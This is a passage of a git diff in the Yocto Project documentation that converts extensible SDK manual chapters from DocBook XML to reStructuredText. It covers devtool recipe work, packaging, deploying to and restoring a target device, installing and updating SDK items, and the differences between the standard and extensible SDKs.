-            written in Python.
-        </para>
-
-        <para>
-            If you look at the contents of a recipe, you will see that the
-            recipe does not include complete instructions for building the
-            software.
-            Instead, common functionality is encapsulated in classes inherited
-            with the <filename>inherit</filename> directive.
-            This technique leaves the recipe to describe just the things that
-            are specific to the software being built.
-            A
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-base'><filename>base</filename></ulink>
-            class exists that is implicitly inherited by all recipes and
-            provides the functionality that most recipes typically need.
-        </para>
-
-        <para>
-            The remainder of this section presents information useful when
-            working with recipes.
-        </para>
-
-        <section id='sdk-finding-logs-and-work-files'>
-            <title>Finding Logs and Work Files</title>
-
-            <para>
-                After the first run of the <filename>devtool build</filename>
-                command, recipes that were previously created using the
-                <filename>devtool add</filename> command or whose sources were
-                modified using the <filename>devtool modify</filename>
-                command contain symbolic links created within the source tree:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>oe-logs</filename>:
-                        This link points to the directory in which log files
-                        and run scripts for each build step are created.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>oe-workdir</filename>:
-                        This link points to the temporary work area for the
-                        recipe.
-                        The following locations under
-                        <filename>oe-workdir</filename> are particularly
-                        useful:
-                            <itemizedlist>
-                                <listitem><para>
-                                    <filename>image/</filename>:
-                                    Contains all of the files installed during
-                                    the
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                                    stage.
-                                    Within a recipe, this directory is referred
-                                    to by the expression
-                                    <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>sysroot-destdir/</filename>:
-                                    Contains a subset of files installed within
-                                    <filename>do_install</filename> that have
-                                    been put into the shared sysroot.
-                                    For more information, see the
-                                    "<link linkend='sdk-sharing-files-between-recipes'>Sharing Files Between Recipes</link>"
-                                    section.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <filename>packages-split/</filename>:
-                                    Contains subdirectories for each package
-                                    produced by the recipe.
-                                    For more information, see the
-                                    "<link linkend='sdk-packaging'>Packaging</link>"
-                                    section.
-                                    </para></listitem>
-                            </itemizedlist>
-                        </para></listitem>
-                </itemizedlist>
-                You can use these links to get more information on what is
-                happening at each build step.
-            </para>
-        </section>
-
-        <section id='sdk-setting-configure-arguments'>
-            <title>Setting Configure Arguments</title>
-
-            <para>
-                If the software your recipe is building uses GNU autoconf,
-                then a fixed set of arguments is passed to it to enable
-                cross-compilation plus any extras specified by
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
-                or
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                set within the recipe.
-                If you wish to pass additional options, add them to
-                <filename>EXTRA_OECONF</filename> or
-                <filename>PACKAGECONFIG_CONFARGS</filename>.
-                Other supported build tools have similar variables
-                (e.g.
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></ulink>
-                for CMake,
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OESCONS'><filename>EXTRA_OESCONS</filename></ulink>
-                for Scons, and so forth).
-                If you need to pass anything on the <filename>make</filename>
-                command line, you can use <filename>EXTRA_OEMAKE</filename> or the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                variables to do so.
-            </para>
-
-            <para>
-                You can use the <filename>devtool configure-help</filename> command
-                to help you set the arguments listed in the previous paragraph.
-                The command determines the exact options being passed, and shows
-                them to you along with any custom arguments specified through
-                <filename>EXTRA_OECONF</filename> or
-                <filename>PACKAGECONFIG_CONFARGS</filename>.
-                If applicable, the command also shows you the output of the
-                configure script's "&dash;&dash;help" option as a reference.
-            </para>
-        </section>
-
-        <section id='sdk-sharing-files-between-recipes'>
-            <title>Sharing Files Between Recipes</title>
-
-            <para>
-                Recipes often need to use files provided by other recipes on
-                the
-                <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
-                For example, an application linking to a common library needs
-                access to the library itself and its associated headers.
-                The way this access is accomplished within the extensible SDK is
-                through the sysroot.
-                One sysroot exists per "machine" for which the SDK is being
-                built.
-                In practical terms, this means a sysroot exists for the target
-                machine, and a sysroot exists for the build host.
-            </para>
-
-            <para>
-                Recipes should never write files directly into the sysroot.
-                Instead, files should be installed into standard locations
-                during the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                task within the
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
-                directory.
-                A subset of these files automatically goes into the sysroot.
-                The reason for this limitation is that almost all files that go
-                into the sysroot are cataloged in manifests in order to ensure
-                they can be removed later when a recipe is modified or removed.
-                Thus, the sysroot is able to remain free from stale files.
-            </para>
-        </section>
-
-        <section id='sdk-packaging'>
-            <title>Packaging</title>
-
-            <para>
-                Packaging is not always particularly relevant within the
-                extensible SDK.
-                However, if you examine how build output gets into the final image
-                on the target device, it is important to understand packaging
-                because the contents of the image are expressed in terms of
-                packages and not recipes.
-            </para>
-
-            <para>
-                During the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                task, files installed during the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                task are split into one main package, which is almost always
-                named the same as the recipe, and into several other packages.
-                This separation exists because not all of those installed files
-                are useful in every image.
-                For example, you probably do not need any of the documentation
-                installed in a production image.
-                Consequently, for each recipe the documentation files are
-                separated into a <filename>-doc</filename> package.
-                Recipes that package software containing optional modules or
-                plugins might undergo additional package splitting as well.
-            </para>
-
-            <para>
-                After building a recipe, you can see where files have gone by
-                looking in the <filename>oe-workdir/packages-split</filename>
-                directory, which contains a subdirectory for each package.
-                Apart from some advanced cases, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
-                variables controls splitting.
-                The <filename>PACKAGES</filename> variable lists all of the
-                packages to be produced, while the <filename>FILES</filename>
-                variable specifies which files to include in each package by
-                using an override to specify the package.
-                For example, <filename>FILES_${PN}</filename> specifies the
-                files to go into the main package (i.e. the main package has
-                the same name as the recipe and
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
-                evaluates to the recipe name).
-                The order of the <filename>PACKAGES</filename> value is
-                significant.
-                For each installed file, the first package whose
-                <filename>FILES</filename> value matches the file is the
-                package into which the file goes.
-                Defaults exist for both the <filename>PACKAGES</filename> and
-                <filename>FILES</filename> variables.
-                Consequently, you might find you do not even need to set these
-                variables in your recipe unless the software the recipe is
-                building installs files into non-standard locations.
-            </para>
-        </section>
-    </section>
-
-    <section id='sdk-restoring-the-target-device-to-its-original-state'>
-        <title>Restoring the Target Device to its Original State</title>
-
-        <para>
-            If you use the <filename>devtool deploy-target</filename>
-            command to write a recipe's build output to the target, and
-            you are working on an existing component of the system, then you
-            might find yourself in a situation where you need to restore the
-            original files that existed prior to running the
-            <filename>devtool deploy-target</filename> command.
-            Because the <filename>devtool deploy-target</filename> command
-            backs up any files it overwrites, you can use the
-            <filename>devtool undeploy-target</filename> command to restore
-            those files and remove any other files the recipe deployed.
-            Consider the following example:
-            <literallayout class='monospaced'>
-     $ devtool undeploy-target lighttpd root@192.168.7.2
-            </literallayout>
-            If you have deployed multiple applications, you can remove them
-            all using the "-a" option thus restoring the target device to its
-            original state:
-            <literallayout class='monospaced'>
-     $ devtool undeploy-target -a root@192.168.7.2
-            </literallayout>
-            Information about files deployed to the target as well as any
-            backed up files are stored on the target itself.
-            This storage, of course, requires some additional space
-            on the target machine.
-            <note>
-                The <filename>devtool deploy-target</filename> and
-                <filename>devtool undeploy-target</filename> commands do not
-                currently interact with any package management system on the
-                target device (e.g. RPM or OPKG).
-                Consequently, you should not intermingle
-                <filename>devtool deploy-target</filename> and package
-                manager operations on the target device.
-                Doing so could result in a conflicting set of files.
-            </note>
-        </para>
-    </section>
-
-    <section id='sdk-installing-additional-items-into-the-extensible-sdk'>
-        <title>Installing Additional Items Into the Extensible SDK</title>
-
-        <para>
-            Out of the box the extensible SDK typically only comes with a small
-            number of tools and libraries.
-            A minimal SDK starts mostly empty and is populated on-demand.
-            Sometimes you must explicitly install extra items into the SDK.
-            If you need these extra items, you can first search for the items
-            using the <filename>devtool search</filename> command.
-            For example, suppose you need to link to libGL but you are not sure
-            which recipe provides libGL.
-            You can use the following command to find out:
-            <literallayout class='monospaced'>
-     $ devtool search libGL
-     mesa                  A free implementation of the OpenGL API
-            </literallayout>
-            Once you know the recipe (i.e. <filename>mesa</filename> in this
-            example), you can install it:
-            <literallayout class='monospaced'>
-     $ devtool sdk-install mesa
-            </literallayout>
-            By default, the <filename>devtool sdk-install</filename> command
-            assumes the item is available in pre-built form from your SDK
-            provider.
-            If the item is not available and it is acceptable to build the item
-            from source, you can add the "-s" option as follows:
-            <literallayout class='monospaced'>
-     $ devtool sdk-install -s mesa
-            </literallayout>
-            It is important to remember that building the item from source
-            takes significantly longer than installing the pre-built artifact.
-            Also, if no recipe exists for the item you want to add to the SDK,
-            you must instead add the item using the
-            <filename>devtool add</filename> command.
-        </para>
-    </section>
-
-    <section id='sdk-applying-updates-to-an-installed-extensible-sdk'>
-        <title>Applying Updates to an Installed Extensible SDK</title>
-
-        <para>
-            If you are working with an installed extensible SDK that gets
-            occasionally updated (e.g. a third-party SDK), then you will need
-            to manually "pull down" the updates into the installed SDK.
-        </para>
-
-        <para>
-            To update your installed SDK, use <filename>devtool</filename> as
-            follows:
-            <literallayout class='monospaced'>
-     $ devtool sdk-update
-            </literallayout>
-            The previous command assumes your SDK provider has set the default
-            update URL for you through the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_UPDATE_URL'><filename>SDK_UPDATE_URL</filename></ulink>
-            variable as described in the
-            "<link linkend='sdk-providing-updates-to-the-extensible-sdk-after-installation'>Providing Updates to the Extensible SDK After Installation</link>"
-            section.
-            If the SDK provider has not set that default URL, you need to
-            specify it yourself in the command as follows:
-            <literallayout class='monospaced'>
-     $ devtool sdk-update <replaceable>path_to_update_directory</replaceable>
-            </literallayout>
-            <note>
-                The URL needs to point specifically to a published SDK and
-                not to an SDK installer that you would download and install.
-            </note>
-        </para>
-    </section>
-
-    <section id='sdk-creating-a-derivative-sdk-with-additional-components'>
-        <title>Creating a Derivative SDK With Additional Components</title>
-
-        <para>
-            You might need to produce an SDK that contains your own custom
-            libraries.
-            A good example would be if you were a vendor with customers that
-            use your SDK to build their own platform-specific software and
-            those customers need an SDK that has custom libraries.
-            In such a case, you can produce a derivative SDK based on the
-            currently installed SDK fairly easily by following these steps:
-            <orderedlist>
-                <listitem><para>
-                    If necessary, install an extensible SDK that
-                    you want to use as a base for your derivative SDK.
-                    </para></listitem>
-                <listitem><para>
-                    Source the environment script for the SDK.
-                    </para></listitem>
-                <listitem><para>
-                    Add the extra libraries or other components you want by
-                    using the <filename>devtool add</filename> command.
-                    </para></listitem>
-                <listitem><para>
-                    Run the <filename>devtool build-sdk</filename> command.
-                    </para></listitem>
-            </orderedlist>
-            The previous steps take the recipes added to the workspace and
-            construct a new SDK installer that contains those recipes and the
-            resulting binary artifacts.
-            The recipes go into their own separate layer in the constructed
-            derivative SDK, which leaves the workspace clean and ready for
-            users to add their own recipes.
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-intro.rst b/documentation/sdk-manual/sdk-intro.rst
new file mode 100644
index 0000000000..acb3f455c5
--- /dev/null
+++ b/documentation/sdk-manual/sdk-intro.rst
@@ -0,0 +1,224 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************
+Introduction
+************
+
+.. _sdk-manual-intro:
+
+eSDK Introduction
+=================
+
+Welcome to the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual. This manual provides information
+that explains how to use both the Yocto Project extensible and standard
+SDKs to develop applications and images.
+
+.. note::
+
+   Prior to the 2.0 Release of the Yocto Project, application
+   development was primarily accomplished through the use of the
+   Application Development Toolkit (ADT) and the availability of
+   stand-alone cross-development toolchains and other tools. With the
+   2.1 Release of the Yocto Project, application development has
+   transitioned to within a tool-rich extensible SDK and the more
+   traditional standard SDK.
+
+All SDKs consist of the following:
+
+-  *Cross-Development Toolchain*: This toolchain contains a compiler,
+   debugger, and various miscellaneous tools.
+
+-  *Libraries, Headers, and Symbols*: The libraries, headers, and
+   symbols are specific to the image (i.e. they match the image).
+
+-  *Environment Setup Script*: This ``*.sh`` file, once run, sets up the
+   cross-development environment by defining variables and preparing for
+   SDK use.
+
+Additionally, an extensible SDK has tools that allow you to easily add
+new applications and libraries to an image, modify the source of an
+existing component, test changes on the target hardware, and easily
+integrate an application into the :term:`OpenEmbedded Build System`.
+
+You can use an SDK to independently develop and test code that is
+destined to run on some target machine. SDKs are completely
+self-contained. The binaries are linked against their own copy of
+``libc``, which results in no dependencies on the target system. To
+achieve this, the pointer to the dynamic loader is configured at install
+time since that path cannot be dynamically altered. This is the reason
+for a wrapper around the ``populate_sdk`` and ``populate_sdk_ext``
+archives.
+
+Another feature for the SDKs is that only one set of cross-compiler
+toolchain binaries are produced for any given architecture. This feature
+takes advantage of the fact that the target hardware can be passed to
+``gcc`` as a set of compiler options. Those options are set up by the
+environment script and contained in variables such as
+:term:`CC` and
+:term:`LD`. This reduces the space needed
+for the tools. Understand, however, that every target still needs a
+sysroot because those binaries are target-specific.
+
+The SDK development environment consists of the following:
+
+-  The self-contained SDK, which is an architecture-specific
+   cross-toolchain and matching sysroots (target and native) all built
+   by the OpenEmbedded build system (e.g. the SDK). The toolchain and
+   sysroots are based on a :term:`Metadata`
+   configuration and extensions, which allows you to cross-develop on
+   the host machine for the target hardware. Additionally, the
+   extensible SDK contains the ``devtool`` functionality.
+
+-  The Quick EMUlator (QEMU), which lets you simulate target hardware.
+   QEMU is not literally part of the SDK. You must build and include
+   this emulator separately. However, QEMU plays an important role in
+   the development process that revolves around use of the SDK.
+
+In summary, the extensible and standard SDK share many features.
+However, the extensible SDK has powerful development tools to help you
+more quickly develop applications. Following is a table that summarizes
+the primary differences between the standard and extensible SDK types
+when considering which to build:
+
++-----------------------+-----------------------+-----------------------+
+| *Feature*             | *Standard SDK*        | *Extensible SDK*      |
++=======================+=======================+=======================+
+| Toolchain             | Yes                   | Yes [1]_              |
++-----------------------+-----------------------+-----------------------+
+| Debugger              | Yes                   | Yes [1]_              |
++-----------------------+-----------------------+-----------------------+
+| Size                  | 100+ MBytes           | 1+ GBytes (or 300+    |
+|                       |                       | MBytes for minimal    |
+|                       |                       | w/toolchain)          |
++-----------------------+-----------------------+-----------------------+
+| ``devtool``           | No                    | Yes                   |
++-----------------------+-----------------------+-----------------------+
+| Build Images          | No                    | Yes                   |
++-----------------------+-----------------------+-----------------------+
+| Updateable            | No                    | Yes                   |
++-----------------------+-----------------------+-----------------------+
+| Managed Sysroot [2]_  | No                    | Yes                   |
++-----------------------+-----------------------+-----------------------+
+| Installed Packages    | No  [3]_              | Yes  [4]_             |
++-----------------------+-----------------------+-----------------------+
+| Construction          | Packages              | Shared State          |
++-----------------------+-----------------------+-----------------------+
+
+.. [1] Extensible SDK contains the toolchain and debugger if :term:`SDK_EXT_TYPE`
+       is "full" or :term:`SDK_INCLUDE_TOOLCHAIN` is "1", which is the default.
+.. [2] Sysroot is managed through the use of ``devtool``. Thus, it is less
+       likely that you will corrupt your SDK sysroot when you try to add
+       additional libraries.
+.. [3] You can add runtime package management to the standard SDK but it is not
+       supported by default.
+.. [4] You must build and make the shared state available to extensible SDK
+       users for "packages" you want to enable users to install.
+
+The Cross-Development Toolchain
+-------------------------------
+
+The :term:`Cross-Development Toolchain` consists
+of a cross-compiler, cross-linker, and cross-debugger that are used to
+develop user-space applications for targeted hardware. Additionally, for
+an extensible SDK, the toolchain also has built-in ``devtool``
+functionality. This toolchain is created by running a SDK installer
+script or through a :term:`Build Directory` that is based on
+your metadata configuration or extension for your targeted device. The
+cross-toolchain works with a matching target sysroot.
+
+.. _sysroot:
+
+Sysroots
+--------
+
+The native and target sysroots contain needed headers and libraries for
+generating binaries that run on the target architecture. The target
+sysroot is based on the target root filesystem image that is built by
+the OpenEmbedded build system and uses the same metadata configuration
+used to build the cross-toolchain.
+
+The QEMU Emulator
+-----------------
+
+The QEMU emulator allows you to simulate your hardware while running
+your application or image. QEMU is not part of the SDK but is made
+available a number of different ways:
+
+-  If you have cloned the ``poky`` Git repository to create a
+   :term:`Source Directory` and you have
+   sourced the environment setup script, QEMU is installed and
+   automatically available.
+
+-  If you have downloaded a Yocto Project release and unpacked it to
+   create a Source Directory and you have sourced the environment setup
+   script, QEMU is installed and automatically available.
+
+-  If you have installed the cross-toolchain tarball and you have
+   sourced the toolchain's setup environment script, QEMU is also
+   installed and automatically available.
+
+SDK Development Model
+=====================
+
+Fundamentally, the SDK fits into the development process as follows:
+
+.. image:: figures/sdk-environment.png
+   :align: center
+
+The SDK is installed on any machine and can be used to develop applications,
+images, and kernels. An SDK can even be used by a QA Engineer or Release
+Engineer. The fundamental concept is that the machine that has the SDK
+installed does not have to be associated with the machine that has the
+Yocto Project installed. A developer can independently compile and test
+an object on their machine and then, when the object is ready for
+integration into an image, they can simply make it available to the
+machine that has the Yocto Project. Once the object is available, the
+image can be rebuilt using the Yocto Project to produce the modified
+image.
+
+You just need to follow these general steps:
+
+1. *Install the SDK for your target hardware:* For information on how to
+   install the SDK, see the "`Installing the
+   SDK <#sdk-installing-the-sdk>`__" section.
+
+2. *Download or Build the Target Image:* The Yocto Project supports
+   several target architectures and has many pre-built kernel images and
+   root filesystem images.
+
+   If you are going to develop your application on hardware, go to the
+   :yocto_dl:`machines </releases/yocto/yocto-3.1.2/machines/>` download area and choose a
+   target machine area from which to download the kernel image and root
+   filesystem. This download area could have several files in it that
+   support development using actual hardware. For example, the area
+   might contain ``.hddimg`` files that combine the kernel image with
+   the filesystem, boot loaders, and so forth. Be sure to get the files
+   you need for your particular development process.
+
+   If you are going to develop your application and then run and test it
+   using the QEMU emulator, go to the
+   :yocto_dl:`machines/qemu </releases/yocto/yocto-3.1.2/machines/qemu>` download area. From this
+   area, go down into the directory for your target architecture (e.g.
+   ``qemux86_64`` for an Intel-based 64-bit architecture). Download the
+   kernel, root filesystem, and any other files you need for your
+   process.
+
+   .. note::
+
+      To use the root filesystem in QEMU, you need to extract it. See
+      the "
+      Extracting the Root Filesystem
+      " section for information on how to extract the root filesystem.
+
+3. *Develop and Test your Application:* At this point, you have the
+   tools to develop your application. If you need to separately install
+   and use the QEMU emulator, you can go to `QEMU Home
+   Page <http://wiki.qemu.org/Main_Page>`__ to download and learn about
+   the emulator. See the ":doc:`../dev-manual/dev-manual-qemu`" chapter in the
+   Yocto Project Development Tasks Manual for information on using QEMU
+   within the Yocto Project.
+
+The remainder of this manual describes how to use the extensible and
+standard SDKs. Information also exists in appendix form that describes
+how you can build, install, and modify an SDK.
diff --git a/documentation/sdk-manual/sdk-intro.xml b/documentation/sdk-manual/sdk-intro.xml
deleted file mode 100644
index 9169fe9c05..0000000000
--- a/documentation/sdk-manual/sdk-intro.xml
+++ /dev/null
@@ -1,352 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-intro'>
-<title>Introduction</title>
-
-<section id='sdk-manual-intro'>
-    <title>Introduction</title>
-
-    <para>
-        Welcome to the Yocto Project Application Development and the
-        Extensible Software Development Kit (eSDK) manual.
-        This manual provides information that explains how to use both the
-        Yocto Project extensible and standard SDKs to develop
-        applications and images.
-        <note>
-            Prior to the 2.0 Release of the Yocto Project, application
-            development was primarily accomplished through the use of the
-            Application Development Toolkit (ADT) and the availability
-            of stand-alone cross-development toolchains and other tools.
-            With the 2.1 Release of the Yocto Project, application development
-            has transitioned to within a tool-rich extensible SDK and the more
-            traditional standard SDK.
-        </note>
-    </para>
-
-    <para>
-        All SDKs consist of the following:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Cross-Development Toolchain</emphasis>:
-                This toolchain contains a compiler, debugger, and various
-                miscellaneous tools.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Libraries, Headers, and Symbols</emphasis>:
-                The libraries, headers, and symbols are specific to the image
-                (i.e. they match the image).
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Environment Setup Script</emphasis>:
-                This <filename>*.sh</filename> file, once run, sets up the
-                cross-development environment by defining variables and
-                preparing for SDK use.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Additionally, an extensible SDK has tools that allow you to easily add
-        new applications and libraries to an image, modify the source of an
-        existing component, test changes on the target hardware, and easily
-        integrate an application into the
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-    </para>
-
-    <para>
-        You can use an SDK to independently develop and test code
-        that is destined to run on some target machine.
-        SDKs are completely self-contained.
-        The binaries are linked against their own copy of
-        <filename>libc</filename>, which results in no dependencies
-        on the target system.
-        To achieve this, the pointer to the dynamic loader is
-        configured at install time since that path cannot be dynamically
-        altered.
-        This is the reason for a wrapper around the
-        <filename>populate_sdk</filename> and
-        <filename>populate_sdk_ext</filename> archives.
-    </para>
-
-    <para>
-        Another feature for the SDKs is that only one set of cross-compiler
-        toolchain binaries are produced for any given architecture.
-        This feature takes advantage of the fact that the target hardware can
-        be passed to <filename>gcc</filename> as a set of compiler options.
-        Those options are set up by the environment script and contained in
-        variables such as
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
-        and
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>.
-        This reduces the space needed for the tools.
-        Understand, however, that every target still needs a sysroot because
-        those binaries are target-specific.
-    </para>
-
-    <para>
-        The SDK development environment consists of the following:
-        <itemizedlist>
-            <listitem><para>
-                The self-contained SDK, which is an
-                architecture-specific cross-toolchain and
-                matching sysroots (target and native) all built by the
-                OpenEmbedded build system (e.g. the SDK).
-                The toolchain and sysroots are based on a
-                <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
-                configuration and extensions,
-                which allows you to cross-develop on the host machine for the
-                target hardware.
-                Additionally, the extensible SDK contains the
-                <filename>devtool</filename> functionality.
-                </para></listitem>
-            <listitem><para>
-                The Quick EMUlator (QEMU), which lets you simulate
-                target hardware.
-                QEMU is not literally part of the SDK.
-                You must build and include this emulator separately.
-                However, QEMU plays an important role in the development
-                process that revolves around use of the SDK.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        In summary, the extensible and standard SDK share many features.
-        However, the extensible SDK has powerful development tools to help you
-        more quickly develop applications.
-        Following is a table that summarizes the primary differences between
-        the standard and extensible SDK types when considering which to
-        build:
-        <informaltable frame='none'>
-            <tgroup cols='3' align='left' colsep='1' rowsep='1'>
-                <colspec colname='c1' colwidth='1*'/>
-                <colspec colname='c2' colwidth='1*'/>
-                <colspec colname='c3' colwidth='1*'/>
-                <thead>
-                    <row>
-                        <entry align="left"><emphasis>Feature</emphasis></entry>
-                        <entry align="left"><emphasis>Standard SDK</emphasis></entry>
-                        <entry align="left"><emphasis>Extensible SDK</emphasis></entry>
-                    </row>
-                </thead>
-                <tbody>
-                    <row>
-                        <entry align="left">Toolchain</entry>
-                        <entry align="left">Yes</entry>
-                        <entry align="left">Yes*</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Debugger</entry>
-                        <entry align="left">Yes</entry>
-                        <entry align="left">Yes*</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Size</entry>
-                        <entry align="left">100+ MBytes</entry>
-                        <entry align="left">1+ GBytes (or 300+ MBytes for minimal w/toolchain)</entry>
-                    </row>
-                    <row>
-                        <entry align="left"><filename>devtool</filename></entry>
-                        <entry align="left">No</entry>
-                        <entry align="left">Yes</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Build Images</entry>
-                        <entry align="left">No</entry>
-                        <entry align="left">Yes</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Updateable</entry>
-                        <entry align="left">No</entry>
-                        <entry align="left">Yes</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Managed Sysroot**</entry>
-                        <entry align="left">No</entry>
-                        <entry align="left">Yes</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Installed Packages</entry>
-                        <entry align="left">No***</entry>
-                        <entry align="left">Yes****</entry>
-                    </row>
-                    <row>
-                        <entry align="left">Construction</entry>
-                        <entry align="left">Packages</entry>
-                        <entry align="left">Shared State</entry>
-                    </row>
-                </tbody>
-            </tgroup>
-        </informaltable>
-        <literallayout class='monospaced'>
-     * Extensible SDK contains the toolchain and debugger if <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink> is "full" or <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink> is "1", which is the default.
-
-     ** Sysroot is managed through the use of <filename>devtool</filename>.  Thus, it is less likely that you will corrupt your SDK sysroot when you try to add additional libraries.
-
-     *** You can add runtime package management to the standard SDK but it is not supported by default.
-
-     **** You must build and make the shared state available to extensible SDK users for "packages" you want to enable users to install.
-        </literallayout>
-    </para>
-
-    <section id='the-cross-development-toolchain'>
-        <title>The Cross-Development Toolchain</title>
-
-        <para>
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>Cross-Development Toolchain</ulink>
-            consists of a cross-compiler, cross-linker, and cross-debugger
-            that are used to develop user-space applications for targeted
-            hardware.
-            Additionally, for an extensible SDK, the toolchain also has
-            built-in <filename>devtool</filename> functionality.
-            This toolchain is created by running a SDK installer script
-            or through a
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-            that is based on your metadata configuration or extension for
-            your targeted device.
-            The cross-toolchain works with a matching target sysroot.
-        </para>
-    </section>
-
-    <section id='sysroot'>
-        <title>Sysroots</title>
-
-        <para>
-            The native and target sysroots contain needed headers and libraries
-            for generating binaries that run on the target architecture.
-            The target sysroot is based on the target root filesystem image
-            that is built by the OpenEmbedded build system and uses the same
-            metadata configuration used to build the cross-toolchain.
-        </para>
-    </section>
-
-    <section id='the-qemu-emulator'>
-        <title>The QEMU Emulator</title>
-
-        <para>
-            The QEMU emulator allows you to simulate your hardware while
-            running your application or image.
-            QEMU is not part of the SDK but is made available a number of
-            different ways:
-            <itemizedlist>
-                <listitem><para>
-                    If you have cloned the <filename>poky</filename> Git
-                    repository to create a
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                    and you have sourced the environment setup script, QEMU is
-                    installed and automatically available.
-                    </para></listitem>
-                <listitem><para>
-                    If you have downloaded a Yocto Project release and unpacked
-                    it to create a Source Directory and you have sourced the
-                    environment setup script, QEMU is installed and
-                    automatically available.
-                    </para></listitem>
-                <listitem><para>
-                    If you have installed the cross-toolchain tarball and you
-                    have sourced the toolchain's setup environment script, QEMU
-                    is also installed and automatically available.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='sdk-development-model'>
-    <title>SDK Development Model</title>
-
-    <para>
-        Fundamentally, the SDK fits into the development process as follows:
-        <imagedata fileref="figures/sdk-environment.png" align="center" width="6in" depth="5in" scalefit="100" />
-        The SDK is installed on any machine and can be used to develop
-        applications, images, and kernels.
-        An SDK can even be used by a QA Engineer or Release Engineer.
-        The fundamental concept is that the machine that has the SDK installed
-        does not have to be associated with the machine that has the
-        Yocto Project installed.
-        A developer can independently compile and test an object on their
-        machine and then, when the object is ready for integration into an
-        image, they can simply make it available to the machine that has the
-        Yocto Project.
-        Once the object is available, the image can be rebuilt using the
-        Yocto Project to produce the modified image.
-    </para>
-
-    <para>
-        You just need to follow these general steps:
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Install the SDK for your target hardware:</emphasis>
-                For information on how to install the SDK, see the
-                "<link linkend='sdk-installing-the-sdk'>Installing the SDK</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Download or Build the Target Image:</emphasis>
-                The Yocto Project supports several target architectures
-                and has many pre-built kernel images and root filesystem
-                images.</para>
-
-                <para>If you are going to develop your application on
-                hardware, go to the
-                <ulink url='&YOCTO_MACHINES_DL_URL;'><filename>machines</filename></ulink>
-                download area and choose a target machine area
-                from which to download the kernel image and root filesystem.
-                This download area could have several files in it that
-                support development using actual hardware.
-                For example, the area might contain
-                <filename>.hddimg</filename> files that combine the
-                kernel image with the filesystem, boot loaders, and
-                so forth.
-                Be sure to get the files you need for your particular
-                development process.</para>
-
-                <para>If you are going to develop your application and
-                then run and test it using the QEMU emulator, go to the
-                <ulink url='&YOCTO_QEMU_DL_URL;'><filename>machines/qemu</filename></ulink>
-                download area.
-                From this area, go down into the directory for your
-                target architecture (e.g. <filename>qemux86_64</filename>
-                for an <trademark class='registered'>Intel</trademark>-based
-                64-bit architecture).
